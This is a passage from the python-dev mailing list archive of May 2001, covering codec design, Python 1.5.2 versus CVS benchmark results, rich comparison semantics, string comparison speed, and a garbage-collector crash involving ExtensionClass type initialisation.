wrote: > > skip wrote: > > > mal> pickle and marshal would also be a good to have wrapped as codecs. > > > > Why? They operate on much more than strings. Of course. Still their basic task is to take an object and encode in some way for dumps() and do the reverse for loads(). That's pretty much what codecs normally do ;-) I wasn't referring to the use of pickle and marshal with string.encode() and .decode(); even though you could then decode a pickle using "pickledata".decode("pickle") and get back the object. These two are very useful though when it comes to using codecs for file wrappers: f = codecs.open('mypicklfile', mode='wb', encoding='pickle') f.write((123, 'abc', 456.789)) f.close() f = codecs.open('mypicklfile', mode='rb', encoding='pickle') t = f.read() f.close() > hypergeneralization, of course. > > more candidates: > > "10".decode("int") > "10.0".decode("float") > "[1, 2, 3]".decode("list") > "readme.txt".decode("file") > "SyntaxError".decode("raise") > (etc) You forgot the most important one ;-) ... "print 'My first Python program'".decode("python").run() -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip@pobox.com (Skip Montanaro) Wed May 16 18:44:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 12:44:15 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com> Message-ID: <15106.48239.813965.579600@beluga.mojam.com> mal> Still their basic task is to take an object and encode in some way mal> for dumps() and do the reverse for loads(). That's pretty much mal> what codecs normally do ;-) Yes, I see that. The conceptual problem I have is that in all previous examples I've seen here they have taken as input and returned as outputs only strings or unicode objects. mal> These two are very useful though when it comes to using codecs mal> for file wrappers: This use I missed. Thanks for the explanation. Skip From mal@lemburg.com Wed May 16 19:33:44 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 20:33:44 +0200 Subject: [Python-Dev] Performance compares Message-ID: <3B02C808.E3354D3F@lemburg.com> After having read a little into the comparison thread, I tried some performance compares on my own: the one between the current CVS version and Python 1.5.2. Both versions were compiled on the same Linux machine, using the same GCC compiler and optimization settings. Here are the results from pybench 0.9 and pystone; some of the figures show quite dramatic slow-downs. I'm not sure where they result from, but they do concern me a bit, since the upgrade path from 1.5.2 is probably the most common one to be expected in user-land. Since it is possible that these figures result from my specific machine setup, I'd like to know what other people see on their machines. Thanks. -- Python 1.5.2: Pystone(1.1) time for 10000 passes = 3.26 This machine benchmarks at 3067.48 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 4.43 This machine benchmarks at 2257.34 pystones/second -- PYBENCH 0.9 Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20) Tests: per run per oper. diff *) ------------------------------------------------------------------------ BuiltinFunctionCalls: 1152.60 ms 9.04 us +64.70% BuiltinMethodLookup: 903.90 ms 1.72 us CompareFloats: 908.30 ms 2.02 us +40.94% CompareFloatsIntegers: 1276.25 ms 2.84 us +37.15% CompareIntegers: 1075.50 ms 1.19 us +21.09% CompareLongs: 989.40 ms 2.20 us +47.12% CompareStrings: 844.80 ms 2.25 us +33.99% CompareUnicode: 1018.65 ms 2.72 us n/a ConcatStrings: 1226.30 ms 8.18 us +92.56% ConcatUnicode: 1575.40 ms 10.50 us n/a CreateInstances: 2094.05 ms 49.86 us +101.86% CreateStringsWithConcat: 1515.75 ms 7.58 us +111.67% CreateUnicodeWithConcat: 1833.85 ms 9.17 us n/a DictCreation: 2795.30 ms 18.64 us +203.34% DictWithFloatKeys: 2285.70 ms 3.81 us +18.73% DictWithIntegerKeys: 1444.65 ms 2.41 us +58.53% DictWithStringKeys: 1262.60 ms 2.10 us +52.83% ForLoops: 989.95 ms 99.00 us -10.01% IfThenElse: 1232.45 ms 1.83 us +23.25% ListSlicing: 621.40 ms 177.54 us NestedForLoops: 986.60 ms 2.82 us +52.09% NormalClassAttribute: 1231.15 ms 2.05 us +36.70% NormalInstanceAttribute: 1114.15 ms 1.86 us +27.11% PythonFunctionCalls: 1251.25 ms 7.58 us +46.09% PythonMethodCalls: 1034.35 ms 13.79 us +42.19% Recursion: 922.15 ms 73.77 us +36.76% SecondImport: 1055.45 ms 42.22 us +100.47% SecondPackageImport: 1061.35 ms 42.45 us +96.31% SecondSubmoduleImport: 1292.35 ms 51.69 us +77.89% SimpleComplexArithmetic: 1748.00 ms 7.95 us +120.97% SimpleDictManipulation: 1172.85 ms 3.91 us +47.85% SimpleFloatArithmetic: 881.25 ms 1.60 us +12.30% SimpleIntFloatArithmetic: 833.80 ms 1.26 us SimpleIntegerArithmetic: 839.00 ms 1.27 us SimpleListManipulation: 1252.60 ms 4.64 us +69.37% SimpleLongArithmetic: 1360.65 ms 8.25 us +100.43% SmallLists: 2380.05 ms 9.33 us +116.72% SmallTuples: 1793.80 ms 7.47 us +101.52% SpecialClassAttribute: 1257.35 ms 2.10 us +37.91% SpecialInstanceAttribute: 1340.25 ms 2.23 us +21.13% StringMappings: 1601.50 ms 12.71 us n/a StringPredicates: 1059.70 ms 3.78 us n/a StringSlicing: 1235.90 ms 7.06 us +98.32% TryExcept: 1272.55 ms 0.85 us +28.39% TryRaiseExcept: 1383.45 ms 92.23 us +77.48% TupleSlicing: 1163.05 ms 11.08 us +75.29% UnicodeMappings: 1232.80 ms 68.49 us n/a UnicodePredicates: 1294.95 ms 5.76 us n/a UnicodeProperties: 1410.45 ms 7.05 us n/a UnicodeSlicing: 1296.80 ms 7.41 us n/a ------------------------------------------------------------------------ Average round time: 73388.00 ms n/a *) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20) (The compares not shown are below noise level (+-10%)) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Wed May 16 20:07:49 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 15:07:49 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. [Guido] > Unclear what you're asking. The language doesn't require any > particular semantics for sequence comparisons, but the language of > course includes the tuple and list squence types, and it describes > (albeing lacking some rigorous detail) what comparisons for those do. The current Tuples and lists are compared lexicographically using comparison of corresponding items. was quite clear in a cmp-only world. In a richcmp world, "compared lexicographically" is fuzzy enough that different implementations may do different things in good faith, competent users may disagree about what it means in specific cases, and programs may yield different results across implementations (or random CVS patches ). > If there are specific lacks of detail, it probably helps to think > about filling those in. The *level* of additional detail intended is the cutoff between what's guaranteed by the language and what's left up to the implementation. The full truth before was relatively simple. For a pair x, y of lists or tuples, def __cmp__(x, y): # pretending this is a method on lists and tuples i = 0 while i < len(x) and i < len(y): c = cmp(x[i], y[i]) if c: return c i += 1 return cmp(len(x), len(y)) was *almost* the entire tale, incl. that lengths were re-fetched on each iteration. What's left unexplained is the treatment of recursive lists, and so the result of comparing them is a prime suspect for different behavior across implementations and releases. In a richcmp world, there are several additional ways in which the above fails to capture the full truth, and each of those ways is another prime suspect for surprises. For example, I believe it's *intended* that: 1. Element comparisons continue to be strictly left-to-right, and that no element comparisons are to be performed after the leftmost element comparison that settles the issue (if any). 2. tuple/list comparison via == or != must use only == comparison on elements, and that implementations are allowed (but not required) to skip all element comparisons when == or != comparison is given lists/tuples of different sizes. OTOH, I doubt (but don't know) it's intended that all implementations must emulate other semantically significant details of the current implementation, like: 1. <=, <, > and >= comparisons will do at most one element comparison that is not an == comparison. 2. Whenever a <, <=, > or >= element comparison is needed, the long- winded details of how that works, incl. but not limited to the specific "first try ==, then try <, then try >" strategy used to simulate a pre-richcmp cmp() when all else fails. Going back to the original example: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> a, b = C(), C() >>> a < b #1 1 >>> [a] < [b] #2 0 >>> cmp(a, b) #3 0 >>> a > b #4 1 >>> a == b #5 1 >>> a != b #6 1 >>> Which of those results are *required* by the language, and which merely *allowed*? + I believe #1, #4 and #5 are required. + I have no idea whether to call it "a bug" if the #2 and/or #3 and/or #6 results differed, e.g., under Jython, or under CPython 2.3. Indeed, I'm not even sure why #6 returns 1 under CPython today, and I've been staring at this a lot lately ... OK, #6 ends up getting resolved by comparing object addresses, which leaves "required or not?" fuzzy (i.e., *must* it be resolved that way? or is it implementation-defined?). From guido@digicool.com Wed May 16 21:35:46 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 15:35:46 -0500 Subject: [Python-Dev] Rich comparison of lists and tuples In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400." References: Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> [Subject fixed] [Tim shows there's a lot left to the imagination when trying to glean the meaning of list1==list2 using rich comparisons.] I would like to break this down by defining the mapping between cmp() and rich comparisons. I propose: - If cmp() is requested but not defined, and rich comparisons are defined, try ==, <, > in order; if all three yield false, act as if rich comparisons were not defined, and use the fallback comparison (i.e. by address). - If a rich comparison is requested but not defined, use cmp() and use the obvious mapping. - Continue to define the comparison of unequal sequences in terms of cmp(). - Testing == or != for sequences takes these shortcuts: 1. if the lengths differ, the sequences differ 2. compare the elements using == until a false return is found Note that this defines 'x!=y' as 'not x==y' for sequences. We could easily go the extra mile and define != to use only != on the items; but is this worth the extra complexity? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Wed May 16 21:37:43 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 15:37:43 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <20010516091942.A16455@glacier.fnational.com> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com> Message-ID: <15106.58647.495143.164636@beluga.mojam.com> Neil> In other words the GC is finding a tuple object that contains an Neil> element with a funny looking address (data segment?) and an Neil> op_type of NULL. Neil, I'm not sure if the funny looking address is a red herring or the key to the crime. I tried running with a breakpoint set in getBaseDictionary. The first couple times, the type parameter looked like $26 = (PyExtensionClass *) 0x80e7f60 $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...} $28 = (PyExtensionClass *) 0x80e8060 $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...} The third time it looked like $30 = (PyExtensionClass *) 0x4019f120 $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...} The difference between the first two calls and the third one is that the first two objects are defined in ExtensionClass.o, which I currently statically link into the interpreter. The Gtk/GObject stuff is dynamically loaded into the running executable, so it's not surprising that it winds up at a wildly different address than the ExtensionClass stuff. My current best guess is that whatever object the tuple is referring to is declared static in the dynamically loaded Gtk stuff and has no business getting reclaimed by the collector. Sounds like a missing Py_INCREF somewhere. At the earliest point I've been able to check that object so far, its ob_type field is NULL. Skip From cpr@emsoftware.com Wed May 16 23:24:15 2001 From: cpr@emsoftware.com (Chris Ryland) Date: Wed, 16 May 2001 18:24:15 -0400 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2> This talk is most entertaining! Highly recommended to you good folk, if only as a reinforcement of the good design principles embodied in Python (with the exception of print >> ;-). Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he wanted to give an example of a modern dynamic language (disclaiming a lot of knowledge about it). He mentioned it three or four times (usually positively), so it must be on the tip of his mind. -- Cheers! Chris Ryland Em Software, Inc. www.emsoftware.com From greg@cosc.canterbury.ac.nz Thu May 17 02:49:31 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 17 May 2001 13:49:31 +1200 (NZST) Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > You forgot the most important one ;-) ... > > "print 'My first Python program'".decode("python").run() Surely that should be: "'My first Python program'.encode('stdout')".decode("python").decode("run") Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From tim.one@home.com Thu May 17 02:56:56 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 21:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > I'll put a patch on SF soon which does what you want to do, i.e. tries > tp_compare as the first thing if tp_richcompare is not there. Thanks! I'll check it out. > Even with this patch, your code is faster if strings have a > richcompare. OK, from what I understand, that makes no sense. Does it to you? Assuming you're still talking about my silly little "ab" < "cd" test, then all the new code you put into your richcompare slot was a waste of cycles for that specific case: the new richcmp "objects the same type?" test would fail, then the new "pointers equal?" test would fail, then the new "op == Py_EQ?" test would fail, and then richcompare would give up and call string_compare() anyway. So I'm either missing something fundamental about what you did, or it's a timing anomaly on your box that defies obvious explanation ("but if I add three new tests that don't pay off, and make an extra call, then it's faster!"). > Without richcompare, I get > > 0.720 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > > With it, I get > > 0.710 > 0.720 > 0.720 > 0.710 > 0.710 > 0.720 > 0.710 > 0.710 > 0.710 > 0.720 See above. > Given that stock CVS python is in the 0.78 range, the different is > neglectable, though. Oh, I don't like giving up that easy on things that make no sense -- something else is happening here, although I've no idea what. From tim.one@home.com Thu May 17 03:17:37 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 22:17:37 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> Message-ID: [MAL] > Since it is possible that these figures result from my specific > machine setup, I'd like to know what other people see on their > machines. Is this the same machine where you were able to get 15% difference a few years ago by adding or removing an unreachable printf in ceval.c (or was that Vladimir)? If so, I bet it's degenerated to random 50% difference since then . My Win98SE box is *astonishingly* useless for timings. Without fail, the first time I run pystone after a reboot yields a result a solid 50% higher than the second or subsequent times I run it (yes, it's major-league *slower* the second time). This is true across dozens of trials over several months, and across all versions of Python. And simple little loops routinely vary in reported runtime by a factor of 3. I may have to dig my old Win95 box out of the packing crate <0.6 wink>. None of that changes, of course, that the numbers you got are scary. From jeremy@digicool.com Wed May 16 23:37:47 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Wed, 16 May 2001 18:37:47 -0400 (EDT) Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> References: <3B02C808.E3354D3F@lemburg.com> Message-ID: <15107.315.19349.268345@slothrop.digicool.com> As usual, the results you're reporting are quite different than what I see on my machine. I'd like to think that my machine is more normal than yours, but I expect we're both oddballs <0.2 wink>. I see basically the same slowdowns that you see, but the amount of the slowdown is quite a bit smaller. I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux 2.2.17. Python 1.5.2: Pystone(1.1) time for 10000 passes = 0.85 This machine benchmarks at 11764.7 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 0.94 This machine benchmarks at 10638.3 pystones/second PYBENCH 0.9 Benchmark: cvs (rounds=10, warp=100) Tests: per run per oper. diff * ------------------------------------------------------------------------ BuiltinFunctionCalls: 41.85 ms 1.64 us +31.40% CompareFloats: 39.60 ms 0.44 us +13.96% CompareFloatsIntegers: CompareIntegers: CompareLongs: 39.85 ms 0.44 us +15.01% CompareStrings: CompareUnicode: ConcatStrings: 48.65 ms 1.62 us +46.76% ConcatUnicode: CreateInstances: 75.75 ms 9.02 us +55.54% CreateStringsWithConcat: 51.60 ms 1.29 us +62.78% CreateUnicodeWithConcat: DictCreation: 87.80 ms 2.93 us +115.72% DictWithFloatKeys: DictWithIntegerKeys: DictWithStringKeys: ForLoops: 63.85 ms 31.93 us -13.60% IfThenElse: ListSlicing: NestedForLoops: 32.95 ms 0.66 us +10.39% NormalClassAttribute: NormalInstanceAttribute: PythonFunctionCalls: 48.85 ms 1.48 us +11.78% PythonMethodCalls: 38.95 ms 2.60 us +12.09% Recursion: SecondImport: 37.80 ms 7.56 us +65.79% SecondPackageImport: 38.95 ms 7.79 us +50.68% SecondSubmoduleImport: 49.90 ms 9.98 us +35.05% SimpleComplexArithmetic: 58.95 ms 1.34 us +74.67% SimpleDictManipulation: SimpleFloatArithmetic: SimpleIntFloatArithmetic: SimpleIntegerArithmetic: SimpleListManipulation: 43.65 ms 0.81 us +15.63% SimpleLongArithmetic: 42.70 ms 1.29 us +53.32% SmallLists: 79.15 ms 1.55 us +56.89% SmallTuples: 66.65 ms 1.39 us +43.03% SpecialClassAttribute: SpecialInstanceAttribute: StringMappings: StringPredicates: StringSlicing: 39.00 ms 1.11 us +28.71% TryExcept: TryRaiseExcept: 50.60 ms 16.87 us +27.46% TupleSlicing: 37.90 ms 1.80 us +26.54% UnicodeMappings: UnicodePredicates: UnicodeProperties: UnicodeSlicing: ------------------------------------------------------------------------ Average round time: 3177.00 ms n/a *) measured against: 1.5.2 (rounds=10, warp=100) (As MAL did, I removed all the results were the difference is +/- 10%.) i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy From martin@loewis.home.cs.tu-berlin.de Thu May 17 07:12:18 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> > OK, from what I understand, that makes no sense. Does it to you? After reviewing everything again, I think I now do: In the richcomp case, I have res = (*f1)(v, w, op); if (res != Py_NotImplemented) return res; f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do c = (*f)(v, w); if (PyErr_Occurred()) return NULL; return convert_3way_to_object(op, c); Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions). I'd still be in favour of giving strings a richcompare, since it allows to optimize what I think is the single most frequent case: Py_EQ on strings. With a control flow like if (a->ob_size != b->ob_size) goto False; if (a->ob_size == 0) goto True; if (a->ob_sval[0] != b->ob_sval[0]) goto False; if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) goto False; else goto True; we can reduce the number of function calls Regards, Martin From skip@pobox.com (Skip Montanaro) Thu May 17 07:42:41 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com> Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem. When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so: PyExtensionClass PyGtkTreeSortable_Type = { PyObject_HEAD_INIT(NULL) 0, /* ob_size */ "GtkTreeSortable", /* tp_name */ sizeof(PyPureMixinObject), /* tp_basicsize */ ... }; Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...) A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values. In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector. The workaround turns out to be exceedingly simple: import gc gc.disable() import gtk gc.enable() I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem. Skip From martin@loewis.home.cs.tu-berlin.de Thu May 17 07:41:15 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> > 1. String objects are also equal despite being different objects, > if their ob_sinterned pointers are equal and non-NULL. So if > you're looking for every trick in & out of the book, that's > another one. That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers. > > So 5% of the calls are with identical strings, for which I can > > immediately decide the outcome. > > But also at the cost of doing a fruitless compare and branch in 95% > of calls. Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write if (__builtin_expect(a == b, 0)) { and then the body of the if block will be moved out of the way of linear control flow. > Any idea where those 800,000 virgin calls to oldcomp are coming > from? That's a lot. As far as I could trace it, most of them come from lookdict_string (at various locations inside this function). > > #comps: 2949421 > > #memcmps: 917776 > > > > So still, ca. 30% can be decided by first byte. > > Sorry, I couldn't follow this part, except noting that 917776 is about 30% of > 2949421, in which case I would have expected you to say that 70% can be > decided by first byte. Oops, you are right. > It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal@lemburg.com Thu May 17 07:54:37 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip@pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Thu May 17 08:00:20 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... Cheers /F From skip@pobox.com (Skip Montanaro) Thu May 17 08:04:06 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. Skip From skip@pobox.com (Skip Montanaro) Thu May 17 08:07:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal@lemburg.com Thu May 17 08:09:38 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip@pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james@daa.com.au Thu May 17 08:18:23 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - 